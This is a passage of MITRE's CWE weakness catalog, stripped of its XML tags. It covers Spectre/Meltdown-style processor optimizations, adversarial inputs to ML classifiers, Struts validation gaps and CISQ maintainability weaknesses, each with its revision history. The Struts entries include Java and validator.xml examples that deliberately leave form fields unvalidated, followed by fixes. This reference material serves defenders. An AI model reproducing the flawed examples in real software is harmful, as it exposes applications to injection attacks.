Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Background_Details, Description + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The developer builds a security-critical protection mechanism into the software, but the processor optimizes the execution of the program such that the mechanism is removed or modified. + + + + + + Primary + This weakness does not depend on other weaknesses and is the result of choices made by the processor in executing the specified application. + + + + + + + + + Architecture and Design + Optimizations built into the design of the processor can have unintended consequences during the execution of an application. + + + Low + + + Integrity + Bypass Protection Mechanism + High + A successful exploitation of this weakness will change the order of an application's execution and will likely be used to bypass specific protection mechanisms. This bypass can be exploited further to potentially read data that should otherwise be unaccessible. + + + + + White Box + In theory this weakness can be detected through the use of white box testing techniques where specifically crafted test cases are used in conjunction with debuggers to verify the order of statements being executed. + Opportunistic + Although the mentioned detection method is theoretically possible, the use of speculative execution is a preferred way of increasing processor performance. The reality is that a large number of statements are executed out of order, and determining if any of them break an access control property would be extremely opportunistic. + + + + + CVE-2017-5715 + Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as "Spectre". + https://www.cve.org/CVERecord?id=CVE-2017-5715 + + + CVE-2017-5753 + Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as "Spectre". + https://www.cve.org/CVERecord?id=CVE-2017-5753 + + + CVE-2017-5754 + Intel processor optimizations related to speculative execution cause access control checks to be bypassed when placing data into the cache. Often known as "Meltdown". + https://www.cve.org/CVERecord?id=CVE-2017-5754 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.9, members of the CWE Hardware SIG are closely analyzing this entry and others to improve CWE's coverage of transient execution weaknesses, which include issues related to Spectre, Meltdown, and other attacks. Additional investigation may include other weaknesses related to microarchitectural state. As a result, this entry might change significantly in CWE 4.10. + + + + CWE Content Team + MITRE + 2018-03-07 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a mechanism that automatically optimizes code, e.g. to improve a characteristic such as performance, but the optimizations can have an unintended side effect that might violate an intended security assumption. + + + + + + + Primary + This weakness does not depend on other weaknesses and is the result of choices made during optimization. + + + + + + + + Architecture and Design + Optimizations built into the design of a product can have unintended consequences during execution. + + + Low + + + Integrity + Alter Execution Logic + The optimizations alter the order of execution resulting in side effects that were not intended by the original developer. + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2018-03-07 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an automated mechanism such as machine learning to recognize complex data inputs (e.g. image or audio) as a particular concept or category, but it does not properly detect or handle inputs that have been modified or constructed in a way that causes the mechanism to detect a different, incorrect concept. + + When techniques such as machine learning are used to automatically classify input streams, and those classifications are used for security-critical decisions, then any mistake in classification can introduce a vulnerability that allows attackers to cause the product to make the wrong security decision. If the automated mechanism is not developed or "trained" with enough input data, then attackers may be able to craft malicious input that intentionally triggers the incorrect classification. + Targeted technologies include, but are not necessarily limited to: + + automated speech recognition + automated image recognition + + For example, an attacker might modify road signs or road surface markings to trick autonomous vehicles into misreading the sign/marking and performing a dangerous action. + + + + + + + + Primary + This weakness does not depend on other weaknesses and is the result of choices made during optimization. + + + + + + + + Architecture and Design + This issue can be introduced into the automated algorithm itself. + + + + + Integrity + Bypass Protection Mechanism + When the automated recognition is used in a protection mechanism, an attacker may be able to craft inputs that are misinterpreted in a way that grants excess privileges. + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Further investigation is needed to determine if better relationships exist or if additional organizational entries need to be created. For example, this issue might be better related to "recognition of input as an incorrect type," which might place it as a sibling of CWE-704 (incorrect type conversion). + + + + CWE Content Team + MITRE + 2018-03-12 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation. + + + + + + + Primary + + + + + + + In order to use the Struts Validator, a form must extend one of the following: ValidatorForm, ValidatorActionForm, DynaValidatorActionForm, and DynaValidatorForm. One of these classes must be extended because the Struts Validator ties in to the application by implementing the validate() method in these classes. Forms derived from the ActionForm and DynaActionForm classes cannot use the Struts Validator. + + + + Implementation + + + + + Other + Other + Bypassing the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is an important component of vulnerabilities like cross-site scripting, process control, and SQL injection. + + + Confidentiality + Integrity + Availability + Other + Other + Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Ensure that all forms extend one of the Validation Classes. + + + + + In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user information from a registration webpage for an online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data. + + public class RegistrationForm extends org.apache.struts.action.ActionForm { + + // private variables for registration formprivate String name;private String email;... + public RegistrationForm() {super();} + // getter and setter methods for private variables... + } + + However, the RegistrationForm class extends the Struts ActionForm class which does not allow the RegistrationForm class to use the Struts validator capabilities. When using the Struts framework to maintain user data in an ActionForm Bean, the class should always extend one of the validator classes, ValidatorForm, ValidatorActionForm, DynaValidatorForm or DynaValidatorActionForm. These validator classes provide default validation and the validate method for custom validation for the Bean object to use for validating input data. The following Java example shows the RegistrationForm class extending the ValidatorForm class and implementing the validate method for validating input data. + + public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { + + // private variables for registration formprivate String name;private String email;... + public RegistrationForm() {super();} + public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...} + // getter and setter methods for private variables... + } + + Note that the ValidatorForm class itself extends the ActionForm class within the Struts framework API. + + + + + Struts: Form Bean Does Not Extend Validation Class + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Background_Details, Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Background_Details + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product has multiple functions, methods, procedures, macros, etc. that + contain the same code. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. For example, if there are two copies of the same code, the programmer might fix a weakness in one copy while forgetting to fix the same weakness in another copy. + + + + + + Indirect + + + + + + + + Other + Reduce Maintainability + + + + + Implementation + Merge common functionality into a single function and then call that function from across the entire code base. + + + + + In the following Java example the code performs some complex math when specific test conditions are met. The math is the same in each case and the equations are repeated within the code. Unfortunately if a future change needs to be made then that change needs to be made in all locations. This opens the door to mistakes being made and the changes not being made in the same way in each instance. + + public class Main { + public static void main(String[] args) { + double s = 10.0; + double r = 1.0; + double pi = 3.14159; + double surface_area; + if(r > 0.0) { + // complex math equations + surface_area = pi * r * s + pi * Math.pow(r, 2); + } + if(r > 1.0) { + // a complex set of math + surface_area = pi * r * s + pi * Math.pow(r, 2); + } + } + } + + It is recommended to place the complex math into its own function and then call that function whenever necessary. + + public class Main { + private double ComplexMath(double r, double s) { + //complex math equations + double pi = Math.PI; + double surface_area = pi * r * s + pi * Math.pow(r, 2); + return surface_area; + } + public static void main(String[] args) { + double s = 10.0; + double r = 1.0; + double surface_area; + if(r > 0.0) { + surface_area = ComplexMath(r, s); + } + if(r > 1.0) { + surface_area = ComplexMath(r, s); + } + } + } + + + + + + ASCMM-MNT-19 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Drew Buttner + 2022-08-15 + Suggested new demonstrative examples, mitigations, and applicable platforms. + + + + + The code contains a member element that is declared as static (but not final), in which + its parent class element + is not a singleton class - that is, a class element that can be used only once in + the 'to' association of a Create action. + This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-3 + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a data element that has an excessively large + number of sub-elements with non-primitive data types such as structures or aggregated objects. + This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + While the interpretation of "excessively large" may vary for each product or developer, CISQ recommends a default of 5 sub-elements. + + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-12 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's architecture contains too many - or too few - + horizontal layers. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + While the interpretation of "expected range" may vary for each product or developer, CISQ recommends a default minimum of 4 layers and maximum of 8 layers. + + + + + + Indirect + + + + + Architecture and Design + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-9 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor. + This issue can prevent the product from running reliably, since the child might not perform essential destruction operations. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability, such as a memory leak (CWE-401). + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-17 + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product creates an immutable text string using string concatenation operations. + When building a string via a looping feature (e.g., a FOR or WHILE loop), the use of += to append to the existing string will result in the creation of a new object with each iteration. This programming pattern can be inefficient in comparison with use of text buffer data elements. This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this could be influenced to create performance problem. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-2 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies. + As an example, with Java, this weakness might indicate cycles between packages. + This issue makes it more difficult to maintain the product due to insufficient modularity, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCMM-MNT-7 + + + ASCRM-RLB-13 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code contains callable control elements that + contain an excessively large number of references to other + application objects external to the context of the callable, + i.e. a Fan-Out value that is excessively large. + While the interpretation of "excessively large Fan-Out value" may vary for each product or developer, CISQ recommends a default of 5 referenced objects. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-4 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs a data query with a large number of joins + and sub-queries on a large data table. + This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + While the interpretation of "large data table" and "large number of joins or sub-queries" may vary for each product or developer, CISQ recommends a default of 1 million rows for a "large" data table, a default minimum of 5 joins, and a default minimum of 3 sub-queries. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-4 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation. + Omitting validation for even a single input field may give attackers the leeway they need to compromise the product. Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. + + + + + + + Primary + + + + + + + + Implementation + Some products use the same ActionForm for more than one purpose. In situations like this, some fields may go unused under some action mappings. + + + + + Integrity + Unexpected State + + + Integrity + Bypass Protection Mechanism + If unused fields are not validated, shared business logic in an action may allow attackers to bypass the validation checks that are performed for other uses of the form. + + + + + Implementation + Validate all form fields. If a field is unused, it is still important to constrain it so that it is empty or undefined. + + + + + In the following example the Java class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml. + + public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { + + // private variables for registration form + private String name;private String address;private String city;private String state;private String zipcode;private String phone;private String email; + public RegistrationForm() {super();} + + // getter and setter methods for private variables + ... + } + + The validator XML file, validator.xml, provides the validation for the form fields of the RegistrationForm. + + <form-validation><formset><form name="RegistrationForm"><field property="name" depends="required"><arg position="0" key="prompt.name"/></field><field property="address" depends="required"><arg position="0" key="prompt.address"/></field><field property="city" depends="required"><arg position="0" key="prompt.city"/></field><field property="state" depends="required,mask"><arg position="0" key="prompt.state"/><var><var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value></var></field><field property="zipcode" depends="required,mask"><arg position="0" key="prompt.zipcode"/><var><var-name>mask</var-name><var-value>\d{5}</var-value></var></field></form></formset></form-validation> + + However, in the previous example the validator XML file, validator.xml, does not provide validators for all of the form fields in the RegistrationForm. Validator forms are only provided for the first five of the seven form fields. The validator XML file should contain validator forms for all of the form fields for a Struts ActionForm bean. The following validator.xml file for the RegistrationForm class contains validator forms for all of the form fields. + + <form-validation><formset><form name="RegistrationForm"><field property="name" depends="required"><arg position="0" key="prompt.name"/></field><field property="address" depends="required"><arg position="0" key="prompt.address"/></field><field property="city" depends="required"><arg position="0" key="prompt.city"/></field><field property="state" depends="required,mask"><arg position="0" key="prompt.state"/><var><var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value></var></field><field property="zipcode" depends="required,mask"><arg position="0" key="prompt.zipcode"/><var><var-name>mask</var-name><var-value>\d{5}</var-value></var></field><field property="phone" depends="required,mask"><arg position="0" key="prompt.phone"/><var><var-name>mask</var-name><var-value>^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$</var-value></var></field><field property="email" depends="required,email"><arg position="0" key="prompt.email"/></field></form></formset></form-validation> + + + + + + Struts: Form Field Without Validator + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Common_Consequences, Description, Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Modes_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product has a loop body or loop condition that contains a control element that directly or + indirectly consumes platform resources, e.g. messaging, sessions, locks, or file + descriptors. + This issue can make the product perform more slowly. If an attacker can influence the number of iterations in the loop, then this performance problem might allow a denial of service by consuming more platform resources than intended. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-8 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product initializes data using hard-coded values that act as network resource identifiers. + This issue can prevent the product from running reliably, e.g. if it runs in an environment does not use the hard-coded network resource identifiers. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-18 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product initializes a data element using a hard-coded + literal that is not a simple integer or static constant element. + This issue makes it more difficult to modify or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-3 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not have documentation that represents how it is designed. + This issue can make it more difficult to understand and maintain the product. It can make it more difficult and time-consuming to detect and/or fix vulnerabilities. + + + + + + Indirect + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code at one architectural layer invokes code that resides + at a deeper layer than the adjacent layer, i.e., the invocation skips at least one + layer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer. + This issue makes it more difficult to understand and maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-12 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a class with inheritance from more than + one concrete class. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + 